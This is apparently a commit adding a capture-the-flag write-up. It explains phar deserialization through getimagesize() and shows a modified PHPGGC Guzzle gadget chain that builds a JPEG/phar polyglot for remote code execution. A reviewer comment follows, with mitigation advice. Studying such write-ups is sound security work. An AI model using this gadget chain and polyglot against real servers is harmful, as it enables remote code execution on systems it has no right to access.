owodelta committed Jan 10, 2020
1 parent bdc2d44 commit b0a9c0f7320b02236df9e0f02be7f7c5034800e5
Showing with 62 additions and 0 deletions.
  1. +62 −0 2020/whitehat-grandprix-2020/web05/
@@ -0,0 +1,62 @@
# Web 05
The challenge has source code (luckily).

We can trigger deserialization because of following vulnerable code:
try {
if ($imageInfo['Height'] && $imageInfo['Width']) {
$height = $imageInfo['Height'];
$width = $imageInfo['Width'];
} else {
list($width, $height) = getimagesize($image);
`getimagesize()` accepts attacker controllable URI. If we pass `phar://` scheme it would trigger phar deserialization.

One more thing we need to care of is our phar archive must be a valid image (or at least look like it). There's a known solution for this problem.

The server uses `http guzzle` that again, fortunately for us, has needed gadget achieve RCE on the server.
The `php-ggc` framework contains a generator code that is changed so that it would generate phar/image polyglot.

The modified code is shown below:
namespace GadgetChain\Guzzle;
class FW1 extends \PHPGGC\GadgetChain\FileWrite
public static $version = '6.0.0 <= 6.3.3+';
public static $vector = '__destruct';
public static $author = 'cf';
public function generate(array $parameters)
$path = $parameters['remote_path'];
$data = $parameters['data'];
$a = new \GuzzleHttp\Cookie\FileCookieJar($path, $data);
$p = new \Phar('pwn.phar', 0);
$p['file.txt'] = 'test';
$p->setStub("\xff\xd8\xff\xe0\x0a<?php __HALT_COMPILER(); ?>");

We upload this "image" to server and record the path.
Then we generate html page that would point to it.
pwn image here
<img src=phar:///app/upload/af55k6peln8ni9270eut7i8uqr/73f2a4aa40cf38e647d802bc.jpg>
Then we fetch image from our server and get RCE.

## Flag
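
Review bot: The `## Flag` heading that closes the file has nothing under it, and the phar/image paragraph cites "a known solution" without naming or linking it; either fill in the flag or drop the heading, and add the reference. The first snippet shows `getimagesize($image)` but not which source file it comes from or how `$image` is derived from the request, so the claim that the URI is attacker controllable cannot be checked from the writeup alone; one line naming the file and the input that reaches `$image` would close that gap. The `<img src=phar:///app/upload/...>` line should also have its attribute value quoted. A closing sentence on the fix would round the writeup out: allow only `http`/`https` URLs before the `getimagesize()` call, or unregister the `phar` stream wrapper with `stream_wrapper_unregister('phar')`.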
